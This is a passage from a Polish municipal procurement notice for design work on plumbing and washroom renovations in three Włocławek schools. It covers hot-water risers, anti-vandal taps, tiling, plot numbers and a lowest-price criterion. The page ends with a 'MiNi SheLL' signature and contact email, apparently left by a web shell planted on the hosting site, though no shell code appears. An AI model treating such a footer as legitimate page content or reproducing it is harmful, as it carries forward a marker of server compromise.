personelu sąsiadujących z toaletami uczniowskimi, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu: Zamówienie obejmuje obiekt Zespołu Szkół Nr 3 stanowiący własność Gminy Miasto Włocławek, położony na działkach o numerach 3/2 i 4/12 Karta Mapy 80, będących w trwałym zarządzie Zespołu Szkół. 2. Zespół Szkół Budowlanych - 6 łazienek uczniowskich, po dwie na każdej kondygnacji. Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - doprowadzenie ciepłej wody i instalacji cyrkulacji do łazienek uczniowskich, - zapewnienie ciepłej wody w łazienkach z prysznicami przy sali gimnastycznej, - montaż mieszaczy, - wymianę instalacji zimnej wody do umywalek oraz wymiana umywalkowych pionów kanalizacyjnych i instalacji zimnej wody do mieszaczy, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu - antywandal, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu: Zamówienie obejmuje obiekt Zespołu Szkół Budowlanych stanowiący własność Gminy Miasto Włocławek, położony na działce numer ?  Karta Mapy 80, będącej w trwałym zarządzie Zespołu Szkół Budowlanych. 3. Zespół Szkół nr 11 - 6 łazienek uczniowskich, po 2 na każdej kondygnacji. Trzy mają zapewnioną ciepłą wodę z bojlera.  Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - wyprowadzenie pionów cw i instalacji cyrkulacji do łazienek z węzła cieplnego, - w pionie łazienek przy sekretariacie w każdej łazience umieścić po 2 umywalki na ścianie po lewo  od wejścia  - przewidzieć dodatkowe piony, - doprowadzenie ciepłej  i zimnej wody do gabinetu pielęgniarki (na parterze) oraz do łazienek  personelu na każdej kondygnacji, - wymianę pionów kanalizacji i instalacji zimnej wody do umywalek (do mieszaczy) w łazienkach oddalonych od sekretariatu, - wymianę istniejących umywalek i baterii umywalkowych na czasowe, samozamykające  typu -antywandal,
- naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu:
Zamówienie obejmuje obiekt Zespołu Szkół Nr 11 stanowiący własność Gminy Miasto Włocławek, położony na działce numer 39/1 Karta Mapy 104, będących w trwałym zarządzie Zespołu Szkół Nr 11.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com